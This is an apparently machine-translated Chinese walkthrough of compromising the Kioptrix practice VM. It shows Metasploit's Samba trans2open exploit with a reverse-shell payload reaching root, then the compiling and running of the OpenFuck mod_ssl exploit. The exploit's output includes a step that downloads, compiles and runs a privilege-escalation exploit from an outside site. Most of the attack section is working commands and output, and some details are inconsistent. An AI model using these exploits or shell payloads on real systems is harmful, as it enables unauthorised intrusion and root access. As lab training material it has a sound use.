使用 Metasploit 获取 Root 权限

在我们在 Kioptrix 上弹出 shell 之前,让我们选择一个我们想要使用的漏洞。回到我们发现的通过 searchsploit 我们甚至可以找到一个具有已知的 Metasploit 模块

由于它经常出现在输出中,让我们尝试一下 trans2open

运行 Metasploit

一旦我们执行了 msfconsole 并且进入了 Metasploit 控制台,我们就可以使用 search 命令搜索 trans2open:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
msf6 > search trans2open

Matching Modules
================
#  Name                              Disclosure Date  Rank   Check  Description
-  ----                              ---------------  ----   -----  -----------
0  exploit/freebsd/samba/trans2open  2003-04-07       great  No     Samba trans2open 
	Overflow (*BSD x86)
1  exploit/linux/samba/trans2open    2003-04-07       great  No     Samba trans2open 
	Overflow (Linux x86)
2  exploit/osx/samba/trans2open      2003-04-07       great  No     Samba trans2open 
	Overflow (Mac OS X PPC)
3  exploit/solaris/samba/trans2open  2003-04-07       great  No     Samba trans2open 
	Overflow (Solaris SPARC)

Interact with a module by name or index. For example info 3, use 3 or use exploit/solaris/samba/trans2open

use

From this list we can use the use command to choose a specific module and enter its context (make sure to choose one which matches the target):

1
2
3
msf6 > use 1
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/samba/trans2open) >

options

现在我们的上下文已经设置好了,我们可以使用 options 来查看该模块有哪些可配置变量:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
msf6 exploit(linux/samba/trans2open) > options

Module options (exploit/linux/samba/trans2open):
   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see <link>
   RPORT   139              yes       The target port (TCP)

Payload options (linux/x86/meterpreter/reverse_tcp):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.4         yes       The listen address (an interface may be 
									   specified)
   LPORT  4444             yes       The listen port

Exploit target:
   Id  Name
   --  ----
   0   Samba 2.2.x - Bruteforce

在这种情况下,我们需要设置 RHOSTS ,同时为我们设置 RPORT (远程端口)、 LHOST (本地主机)和 LPORT (本地端口)(如果需要,我们可以更改这些)。

set

为了设置这些选项,我们可以使用 set 命令 + 我们想要设置的值和新值:

1
2
msf6 exploit(linux/samba/trans2open) > set rhosts 10.0.2.5
rhosts => 10.0.2.5

show

使用 show 命令我们可以验证目标模块(不是目标主机)。这包括我们正在利用的服务以及技术:

1
2
3
4
5
6
7
msf6 exploit(linux/samba/trans2open) > show targets

Exploit targets:
=================
    Id  Name
    --  ----
=>  0   Samba 2.2.x - Bruteforce

show 还可以向我们展示编码器、nop、漏洞利用、有效负载、辅助工具、帖子、插件、信息、选项和收藏夹(所有这些都与 Metasploit 框架和我们所处的上下文相关)(使用 show all 一次性获取所有这些列表)。

run / exploit

一旦我们验证了上下文和变量,我们就可以使用 runexploit 命令来运行我们的漏洞利用程序:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
msf6 exploit(linux/samba/trans2open) > exploit       # <- staged payload

[*] Started reverse TCP handler on 10.0.2.4:4444 
[*] 10.0.2.5:139 - Trying return address 0xbffffdfc...
[*] 10.0.2.5:139 - Trying return address 0xbffffcfc...
[*] 10.0.2.5:139 - Trying return address 0xbffffbfc...
[*] 10.0.2.5:139 - Trying return address 0xbffffafc...
[*] Sending stage (1017704 bytes) to 10.0.2.5        # <- sending stage is a good sign
[*] 10.0.2.5 - Meterpreter session 1 closed.  Reason: Died
[*] 10.0.2.5:139 - Trying return address 0xbffff9fc...
[*] Sending stage (1017704 bytes) to 10.0.2.5
[*] 10.0.2.5 - Meterpreter session 2 closed.  Reason: Died
[-] Meterpreter session 2 is not valid and will be closed
[*] 10.0.2.5:139 - Trying return address 0xbffff8fc...
[*] Sending stage (1017704 bytes) to 10.0.2.5
[*] 10.0.2.5 - Meterpreter session 3 closed.  Reason: Died
[*] 10.0.2.5:139 - Trying return address 0xbffff7fc...
[*] Sending stage (1017704 bytes) to 10.0.2.5
[*] 10.0.2.5 - Meterpreter session 4 closed.  Reason: Died
[*] 10.0.2.5:139 - Trying return address 0xbffff6fc...
[*] 10.0.2.5:139 - Trying return address 0xbffff5fc... # <- we know it's failed
^C
[-] 10.0.2.5:139 - Exploit failed [user-interrupt]: Interrupt 
[-] exploit: Interrupted

该漏洞利用不起作用,部分原因是我们没有设置有效负载。相反,Metasploit 设置了默认负载 (linux/x86/meterpreter/reverse_tcp)。我们可以从路径中看出它是一个“暂存的有效负载”,这可能是它不起作用的部分原因。

set

要设置我们自己的有效负载,我们可以使用 set 命令。这给了metasploit一些东西来实际注入内存,我们可以通过这个buffer-overflow访问内存。要查看所有有效负载的列表,您可以开始输入 set payload,然后双击以查看所有可用选项:

1
2
3
4
5
6
7
msf6 exploit(linux/samba/trans2open) > set payload 
set payload generic/custom
set payload generic/debug_trap
set payload generic/shell_bind_aws_ssm
set payload generic/shell_bind_tcp
set payload generic/shell_reverse_tcp
...

在这种情况下,我们需要一个能够在 Linux 目标上成功执行的有效负载。

1
2
3
4
5
6
7
8
9
10
set payload linux/x86/samba/reverse_shell_tcp
payload => linux/x86/shell_reverse_tcp
msf6 exploit(linux/samba/trans2open) > run
*] Started reverse TCP handler on 10.0.2.4:4444 
[*] 10.0.2.5:139 - Trying return address 0xbffffdfc...
[*] 10.0.2.5:139 - Trying return address 0xbffffcfc...
[*] 10.0.2.5:139 - Trying return address 0xbffffbfc...
[*] Command shell session 12 opened (10.0.2.4:4444 -> 10.0.2.5:32800) at 2023-09-30 16:43:23 -0400
whoami
root # <--- output from target

#“手动”获取root权限
我们可以手动实现相同的结果,而不是使用 Metasploit 为我们做所有事情。

开放性

OpenFuck 是我们发现 Kioptrix 可能容易受到攻击的另一个漏洞。让我们尝试手动利用 Kioptrix。

使用 Searchsploit

我们可以从 Exploit-DB 或使用 searchsploit 命令获取 OpenFuck 的漏洞利用代码(因为我们手头已经下载了大部分 Exploit DB 数据库的库)。

1
2
3
4
5
6
7
8
searchsploit openfuck
 Exploit Title                                             |  Path
----------------------------------------------------------------------- --------------
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c'              |unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c'            | unix/remote/47080.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c'            | unix/remote/764.c
----------------------------------------------------------------------- --------------
Shellcodes: No Results

我们手头有 3 个版本的 OpenFuck。我们使用 OpenFuck.c,它位于 /etc/share/exploitdb/exploits/usr/remote/21671.c。我们不使用此版本,而是将其复制到名为 kioptrix 的新文件夹中

1
2
mkdir kioptrix
cp /usr/share/exploitdb/exploits/unix/remote/21671.c kioptrix/21671.c

在我们的计算机上执行一些随机恶意软件之前让我们根据漏洞利用数据库上列出的官方存储库(托管在 GitLab 上)进行检查。 ExploitDB 和存储库都将此代码标记为“EDB 已验证”,这意味着它们已经在自身中进行了测试。

运行 OpenFuck.c

如果我们捕获 OpenFuck 代码,我们可以在文件顶部找到一些说明:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/*
source: https://www.securityfocus.com/bid/5363/info

A buffer-overflow vulnerability has been reported in some versions of OpenSSL.
The issue occurs in the handling of the client key value during the negotiation of the SSLv2 protocol. A malicious client may be able to exploit this vulnerability to execute arbitrary code as the vulnerable server process or possibly to create a denial-of-service condition.

***UPDATE: A worm that likely exploits this vulnerability has been discovered propagating in the wild. Additionally, this code includes peer-to-peer and distributed denial-of-service capabilities. There have been numerous reports of intrusions in Europe. It is not yet confirmed whether this vulnerability is in OpenSSL, mod_ssl, or another component. Administrators are advised to upgrade to the most recent versions or to disable Apache, if possible, until more information is available.
*/
/*
 * VERY PRIV8 spabam SPAX@zone-h.org
 * Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
 *
 */
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
...

We can see from the output that we need to compile the code using gcc:

1
2
3
4
5
6
7
gcc -o openfuck 21671.c -lcrypto
21671.c:715:31: error: ‘SSL2_MAX_CONNECTION_ID_LENGTH’ undeclared here (not in a function); did you mean ‘SSL3_MAX_SSL_SESSION_ID_LENGTH’?
  715 |         unsigned char conn_id[SSL2_MAX_CONNECTION_ID_LENGTH];
      |                               ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      |                               SSL3_MAX_SSL_SESSION_ID_LENGTH
21671.c:723:9: error: unknown type name ‘RC4_KEY’
  723 |         RC4_KEY* rc4_read_key;

不幸的是,这段代码很旧并且不容易编译。因此,我们必须要么自己修复所有错误,要么找到已经存在错误的人。

找到一个工作版本

当我们使用 searchsploit 查找所有 r/t OpenFuck 漏洞利用代码时,列出了三个版本,其中之一是 OpenFuckv2.c w/ ID 为 47080。我们可以将其 cp 到我们的 kioptrix 目录中,如下所示:

1
cp /usr/share/exploitdb/exploits/unix/remote/47080 openfuck.c

exploit db 上查找此版本,我们可以看到它没有像 ID 21671 那样经过验证。但是,如果我们访问 GitLab 存储库,我们可以尝试自己验证代码。

然后我们可以尝试使用 gcc 编译它:

1
2
3
4
5
gcc -o openfuck of.c -lcrypto
of.c: In function ‘read_ssl_packet’:
of.c:534:17: warning: ‘RC4’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  534 |                 RC4(ssl->rc4_read_key, rec_len, buf, buf);
...

这次 gcc 只列出警告而没有错误,如果我们检查目录,我们可以看到我们的二进制文件存在 openfuck

剥削

为了弄清楚如何针对目标使用我们的二进制文件,我们可以在没有任何标志的情况下运行它,并查看输出是否为我们提供了使用提示:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
./openfuck

*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

: Usage: ./openfuck target box [port] [-c N]

  target - supported box eg: 0x00
  box - hostname or IP address
  port - port for ssl connection
  -c open N connections. (use range 40-50 if u dont know)
  
  Supported OffSet:
        0x00 - Caldera OpenLinux (apache-1.3.26)
        0x01 - Cobalt Sun 6.0 (apache-1.3.12)
        0x02 - Cobalt Sun 6.0 (apache-1.3.20)
...

我们需要滚动目标的“支持的偏移量”:

1
2
3
...
	0x60 - RedHat Linux 7.0 (apache-1.3.14-2)
    0x61 - RedHat Linux 7.0-Update (apache-1.3.22-5.7.1)

执行

命令和输出:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
./openfuck 0x6b 10.0.2.5 -c 45
./openfuck 0x6b 10.0.2.5 -c 45                                                        
*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
...

Connection... 45 of 45
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f8100
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ 
d.c; ./exploit; -kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmo 
--07:58:31--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c`
Connecting to dl.packetstormsecurity.net:443... connected!

Unable to establish SSL connection.

Unable to establish SSL connection.
gcc: ptrace-kmod.c: No such file or directory
gcc: No input files
rm: cannot remove `ptrace-kmod.c`: No such file or directory
bash: ./exploit: No such file or directory
bash-2.05$            # <---- rev shell
bash-2.05$ whoami     # <---- our test command 
whoami                
apache                # <---- output on target machine

[!My previous notes (linked in text)]

[!Resources]